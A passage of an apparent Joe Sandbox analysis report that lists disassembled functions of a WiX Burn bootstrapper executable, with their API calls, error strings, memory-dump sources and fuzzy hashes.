Function 009A752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get manifest stream from container., xrefs: 009A75CC
WixBundleSourceProcessFolder, xrefs: 009A7734
Failed to extract bootstrapper application payloads., xrefs: 009A77EF
Failed to overwrite the %ls built-in variable., xrefs: 009A76BB
Failed to load catalog files., xrefs: 009A780F
Failed to parse command line., xrefs: 009A7667
Failed to open manifest stream., xrefs: 009A75AB
Failed to get source process folder from path., xrefs: 009A7725
Failed to load manifest., xrefs: 009A75E8
Failed to open attached UX container., xrefs: 009A758E
Failed to set source process path variable., xrefs: 009A7709
Failed to set original source variable., xrefs: 009A776A
WixBundleUILevel, xrefs: 009A76D6, 009A76E7
Failed to set source process folder variable., xrefs: 009A7745
WixBundleSourceProcessPath, xrefs: 009A76F8
WixBundleElevated, xrefs: 009A76A5, 009A76B6
Failed to initialize variables., xrefs: 009A7571
WixBundleOriginalSource, xrefs: 009A7759
Failed to initialize internal cache functionality., xrefs: 009A779F
Failed to get unique temporary folder for bootstrapper application., xrefs: 009A77CE

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
API String ID: 32694325-1564579409
Opcode ID: 37853855fb40392220c5ffb93d6a146e497f403cd2a94c0ca3d95a20a2eec549
Instruction ID: e5714f66f4ee02aaf8ec8cf0a8ff183424c2fed4da200812834fc24062a21a5a
Opcode Fuzzy Hash: 37853855fb40392220c5ffb93d6a146e497f403cd2a94c0ca3d95a20a2eec549
Instruction Fuzzy Hash: 7AA17FB2E4461ABBDB129AE8CC86FEEF76CBB45700F014626B515E7241D734E944CBE0

Function 009A86D0 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 209
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00994DBC,?,?,00000000,00994DBC,00000000), ref: 009A8713
GetLastError.KERNEL32 ref: 009A8720

Part of subcall function 009D3EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 009D3F73

SetFilePointerEx.KERNEL32(00000000,009DB4B8,00000000,00000000,00000000,?,00000000,009DB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A87CD
GetLastError.KERNEL32 ref: 009A87D7
CloseHandle.KERNELBASE(00000000,?,00000000,009DB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A8902

Strings

Failed to seek to beginning of engine file: %ls, xrefs: 009A8779
Failed to seek to signature table in exe header., xrefs: 009A886C
Failed to zero out original data offset., xrefs: 009A88F4
msi.dll, xrefs: 009A8814
cabinet.dll, xrefs: 009A887B
Failed to update signature offset., xrefs: 009A8821
Failed to copy engine from: %ls to: %ls, xrefs: 009A87A8
Failed to seek to checksum in exe header., xrefs: 009A8805
cache.cpp, xrefs: 009A8744, 009A87FB, 009A8862, 009A88D1
Failed to seek to original data in exe burn section header., xrefs: 009A88DB
Failed to create engine file at path: %ls, xrefs: 009A8751

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerRead
String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
API String ID: 3456208997-1976062716
Opcode ID: 21df2f544dec0555fbc60204c68c302c3e1ec05b8a9a1766cf3fa0db4f583930
Instruction ID: 07a747eebde15906c1e4556298d6ebe66409a11a67ca8ad711c4361efdf27f8c
Opcode Fuzzy Hash: 21df2f544dec0555fbc60204c68c302c3e1ec05b8a9a1766cf3fa0db4f583930
Instruction Fuzzy Hash: FC51F973E91235BBDB125A998C46F7F7668EF85B60F114125FE10FB281EF249C0096E2

Function 0099762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(009A756B,009953BD,00000000,00995445), ref: 0099764C

Strings

InstallerVersion, xrefs: 00997833
WixBundleExecutePackageCacheFolder, xrefs: 00997D98
WixBundleForcedRestartPackage, xrefs: 00997E14
WixBundleSourceProcessFolder, xrefs: 00997E9E
WixBundleVersion, xrefs: 00997ECE
WixBundleActiveParent, xrefs: 00997E62
', xrefs: 009978EB
WixBundleAction, xrefs: 00997D76
0, xrefs: 00997663
WixBundleExecutePackageAction, xrefs: 00997DF8
Failed to add built-in variable: %ls., xrefs: 00997F19
WixBundleTag, xrefs: 00997EAE
Date, xrefs: 00997770
WixBundleProviderKey, xrefs: 00997E7E
WixBundleUILevel, xrefs: 00997EBE
#, xrefs: 009976CB
WixBundleSourceProcessPath, xrefs: 00997E8E
WixBundleElevated, xrefs: 00997E46
InstallerName, xrefs: 00997812
$, xrefs: 00997D49
WixBundleInstalled, xrefs: 00997E2A
LogonUser, xrefs: 00997882

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: b260e5ac532c0e8d5efb8256a190984272ed19847973d492bdda7e24b224090d
Instruction ID: 8ba2c92786bc6bdd8dc196eaafa10c9a7bc111584ebcadb8b1f933b2eadfb290
Opcode Fuzzy Hash: b260e5ac532c0e8d5efb8256a190984272ed19847973d492bdda7e24b224090d
Instruction Fuzzy Hash: 623234F0D5572A9BDB758F5AC98879DFAF4BB49304F9085EED20CA6210C7B10A88CF45

Function 009A82BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00995489), ref: 009A8310

Part of subcall function 009D0879: OpenProcessToken.ADVAPI32(?,00000008,?,009953BD,00000000,?,?,?,?,?,?,?,009A769D,00000000), ref: 009D0897
Part of subcall function 009D0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,009A769D,00000000), ref: 009D08A1
Part of subcall function 009D0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,009A769D,00000000), ref: 009D092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 009A8336
GetLastError.KERNEL32 ref: 009A8340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 009A83BD
GetLastError.KERNEL32 ref: 009A83C7
UuidCreate.RPCRT4(?), ref: 009A8406

Strings

4Wu, xrefs: 009A83BD
Failed to concat Temp directory on windows path for working folder., xrefs: 009A83AD
Failed to get temp path for working folder., xrefs: 009A83F5
Failed to append bundle id on to temp path for working folder., xrefs: 009A8470
Temp\, xrefs: 009A8395
%ls%ls\, xrefs: 009A8458
Failed to copy working folder path., xrefs: 009A848B
Failed to convert working folder guid into string., xrefs: 009A8446
cache.cpp, xrefs: 009A8364, 009A83EB, 009A843C
Failed to get windows path for working folder., xrefs: 009A836E
Failed to ensure windows path for working folder ended in backslash., xrefs: 009A838B
Failed to create working folder guid., xrefs: 009A8413

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4Wu$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-571614469
Opcode ID: f163d2ed7fc3b783019996e66eec10c2e40cc57bb390dabda3de4cb976778ffd
Instruction ID: 7caebcdf591b4d9222aae8ba6447de66d9ee9b0215c5fc8bcd2c3960cad85f50
Opcode Fuzzy Hash: f163d2ed7fc3b783019996e66eec10c2e40cc57bb390dabda3de4cb976778ffd
Instruction Fuzzy Hash: 4F414A72E85325B7CF3196E58C0AFAB77ACAB85B54F014465BA08F7180EE74DD4086D1

Function 009B10FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 009B111D
CoUninitialize.COMBASE ref: 009B1398

Strings

Invalid operation for this state., xrefs: 009B137C
cabextract.cpp, xrefs: 009B1193, 009B12BA, 009B1307, 009B1346, 009B1372
Failed to reset begin operation event., xrefs: 009B1350
Failed to initialize cabinet.dll., xrefs: 009B119F
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 009B1279
Failed to set operation complete event., xrefs: 009B12C4
Failed to wait for begin operation event., xrefs: 009B1311
Failed to initialize COM., xrefs: 009B1129
<the>.cab, xrefs: 009B11BD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: 861db541f95104405d7eed1116a28721ca7f0413c961e390a0d7fa0ddd0ba052
Instruction ID: 5ba343d79a22eed1df5720786e54977191e40dc227f2f85918592ddd8881f09f
Opcode Fuzzy Hash: 861db541f95104405d7eed1116a28721ca7f0413c961e390a0d7fa0ddd0ba052
Instruction Fuzzy Hash: 8F519E379852A1E7CF2057958F25EFB36589BC1B70B66432AFD21FB3A0D6198D00D2D1

Function 009942D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00995266,?,?,00000000,?,?), ref: 00994303
InitializeCriticalSection.KERNEL32(000000D0,?,?,00995266,?,?,00000000,?,?), ref: 0099430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00995266,?,?,00000000,?,?), ref: 00994352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00995266,?,?,00000000,?,?), ref: 0099435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00995266,?,?,00000000,?,?), ref: 00994370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00995266,?,?,00000000,?,?), ref: 00994380
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00995266,?,?,00000000,?,?), ref: 009943D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00995266,?,?,00000000,?,?), ref: 009943DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00995266,?,?,00000000,?,?), ref: 009943EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00995266,?,?,00000000,?,?), ref: 009943FE

Strings

engine.cpp, xrefs: 00994495, 009944C1
burn.filehandle.self, xrefs: 009943CB, 009943D3, 009943D8, 009943D9, 009943F9, 009944CB
burn.filehandle.attached, xrefs: 0099434D, 00994355, 0099435A, 0099435B, 0099437B, 0099449F
Missing required parameter for switch: %ls, xrefs: 009944A4
Failed to initialize engine section., xrefs: 00994467
Failed to parse file handle: '%ls', xrefs: 00994482

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3039292287-3209860532
Opcode ID: a269dbc11e0f337d2fe4f624a8d66f4796063ca25ae1976990c2c422fa84ccc0
Instruction ID: fb4ad09275a8431500821687f266c56355346dc9a2be538eaf628bcba1b598ab
Opcode Fuzzy Hash: a269dbc11e0f337d2fe4f624a8d66f4796063ca25ae1976990c2c422fa84ccc0
Instruction Fuzzy Hash: 4951D471A84215FFCB25DF68CC86F9A77ACEF44B60F014116F614E72A0D770A951CAA0

Function 0099C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0099C47F,00995405,?,?,00995445), ref: 0099C2D6
GetLastError.KERNEL32(?,0099C47F,00995405,?,?,00995445,00995445,00000000,?,00000000), ref: 0099C2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0099C47F,00995405,?,?,00995445,00995445,00000000,?), ref: 0099C336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,0099C47F,00995405,?,?,00995445,00995445,00000000,?,00000000), ref: 0099C33C
DuplicateHandle.KERNELBASE(00000000,?,0099C47F,00995405,?,?,00995445,00995445,00000000,?,00000000), ref: 0099C33F
GetLastError.KERNEL32(?,0099C47F,00995405,?,?,00995445,00995445,00000000,?,00000000), ref: 0099C349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0099C47F,00995405,?,?,00995445,00995445,00000000,?,00000000), ref: 0099C39B
GetLastError.KERNEL32(?,0099C47F,00995405,?,?,00995445,00995445,00000000,?,00000000), ref: 0099C3A5

Strings

Failed to duplicate handle to container: %ls, xrefs: 0099C37A
feclient.dll, xrefs: 0099C398
container.cpp, xrefs: 0099C30B, 0099C36D, 0099C3C9
crypt32.dll, xrefs: 0099C397
Failed to open file: %ls, xrefs: 0099C318
Failed to move file pointer to container offset., xrefs: 0099C3D3
Failed to open container., xrefs: 0099C3F1

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: 7aa1dbc56e332d8f16fb4fca62aa00d5001d18b38b4d433705377beff4c2bc7a
Instruction ID: 5e3c5a281361fe927e1498559ff97d463f3edeb0293c097d555548b1df61d3a7
Opcode Fuzzy Hash: 7aa1dbc56e332d8f16fb4fca62aa00d5001d18b38b4d433705377beff4c2bc7a
Instruction Fuzzy Hash: D841A676180201ABDF209F5D9D46F1B7BA9EBC4760F21C42AF915AB341DB71C801DB60

Function 009D2AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00993838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00993877
Part of subcall function 00993838: GetLastError.KERNEL32 ref: 00993881

Part of subcall function 009D4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 009D4A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 009D2B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 009D2B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 009D2B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 009D2BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 009D2BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 009D2BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 009D2C01

Strings

MsiDetermineApplicablePatchesW, xrefs: 009D2B56
MsiGetProductInfoExW, xrefs: 009D2BB6
MsiDeterminePatchSequenceW, xrefs: 009D2B36
MsiEnumProductsExW, xrefs: 009D2B76
MsiSetExternalUIRecord, xrefs: 009D2BD6
MsiSourceListAddSourceExW, xrefs: 009D2BF6
Msi.dll, xrefs: 009D2B09
MsiGetPatchInfoExW, xrefs: 009D2B96

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: f48f825f21ad63393e4f561ec932b5e144a0933d76b6f7e2cc30aa9045d29604
Instruction ID: 6c2be859bc0bba6e35cb201fad06413c951d7ad9b2d9a0d9bdedd465cfe279d6
Opcode Fuzzy Hash: f48f825f21ad63393e4f561ec932b5e144a0933d76b6f7e2cc30aa9045d29604
Instruction Fuzzy Hash: 2E31E3719A9308EFDB119F20ED02B397BA4FB60328F10412BE514D66B0EBB64855FF54

Function 009B1741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0099C3EB,?,00000000,?,0099C47F), ref: 009B1778
GetLastError.KERNEL32(?,0099C3EB,?,00000000,?,0099C47F,00995405,?,?,00995445,00995445,00000000,?,00000000), ref: 009B1781

Strings

Failed to create operation complete event., xrefs: 009B17F5
cabextract.cpp, xrefs: 009B17A5, 009B17EB, 009B1837
Failed to copy file name., xrefs: 009B1763
Failed to create begin operation event., xrefs: 009B17AF
Failed to wait for operation complete., xrefs: 009B1854
wininet.dll, xrefs: 009B1757
Failed to create extraction thread., xrefs: 009B1841

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: 60def3abe53db52f330539e24ccce75b0e196142e0238c7964bd3acb0a8ddb9d
Instruction ID: 4d0409c8d0a3ebb5814b3c5d86f9d3872368c77fc1b24e5e6f0372acc46bd067
Opcode Fuzzy Hash: 60def3abe53db52f330539e24ccce75b0e196142e0238c7964bd3acb0a8ddb9d
Instruction Fuzzy Hash: 85217077D8173677D73216964E95F9B6A5CFF40BB4B534126BE00BB181EB54DC0081E1

Function 009CFCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 009CFCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 009CFCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 009CFD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 009CFD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 009CFD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 009CFD8B

Strings

SystemFunction040, xrefs: 009CFCCB
CryptProtectMemory, xrefs: 009CFD20
cryputil.cpp, xrefs: 009CFD60
CryptUnprotectMemory, xrefs: 009CFD6C
SystemFunction041, xrefs: 009CFCD8
AdvApi32.dll, xrefs: 009CFCB5
Crypt32.dll, xrefs: 009CFD0C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: 152f975e7dfa8d3d39b4d93cc5eb9728a702ff4e9832ea076ece14520e1fc70b
Instruction ID: e8ad9f40c307548e74583669b52f57a7aeb7f30f9536763ea740666822250ed2
Opcode Fuzzy Hash: 152f975e7dfa8d3d39b4d93cc5eb9728a702ff4e9832ea076ece14520e1fc70b
Instruction Fuzzy Hash: 1721D772DA933A97C7215F16ED15F767995AB40B54F020139FD01AB2E0E7688C00FBD1

Function 009B08C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 009B08F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 009B090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 009B090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 009B0912
GetLastError.KERNEL32(?,?), ref: 009B091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 009B098B
GetLastError.KERNEL32(?,?), ref: 009B0998

Strings

cabextract.cpp, xrefs: 009B0940, 009B09BC
Failed to add virtual file pointer for cab container., xrefs: 009B0971
Failed to open cabinet file: %hs, xrefs: 009B09C9
<the>.cab, xrefs: 009B08EB
Failed to duplicate handle to cab container., xrefs: 009B094A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 0369eaa1ee23a847acdac406cad874e2531b47ef2ae3a782235831b2c09fd7ff
Instruction ID: fd54995373b9ae0443233871e7a8dc4ec90887ce91daf2350e7a8603146116a7
Opcode Fuzzy Hash: 0369eaa1ee23a847acdac406cad874e2531b47ef2ae3a782235831b2c09fd7ff
Instruction Fuzzy Hash: B231D436982239FBEB215B958D49F9FBB6CEF84770F124116FE14B7251D720AD0096E0

Function 009A6A57 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00994E11,?,?), ref: 009A6A77
GetCurrentProcess.KERNEL32(?,00000000,?,?,00994E11,?,?), ref: 009A6A7D
DuplicateHandle.KERNELBASE(00000000,?,?,00994E11,?,?), ref: 009A6A80
GetLastError.KERNEL32(?,?,00994E11,?,?), ref: 009A6A8A
CloseHandle.KERNEL32(000000FF,?,00994E11,?,?), ref: 009A6B03

Strings

Failed to duplicate file handle for attached container., xrefs: 009A6AB8
%ls -%ls=%u, xrefs: 009A6AD7
burn.filehandle.attached, xrefs: 009A6AD0
core.cpp, xrefs: 009A6AAE
Failed to append the file handle to the command line., xrefs: 009A6AEB

Memory Dump Source

